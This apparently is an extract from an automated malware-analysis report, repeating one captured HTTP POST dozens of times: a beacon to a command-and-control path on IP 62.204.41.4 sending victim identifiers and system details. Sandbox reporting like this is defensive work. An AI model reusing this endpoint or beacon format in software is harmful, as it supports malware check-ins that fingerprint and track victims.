                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
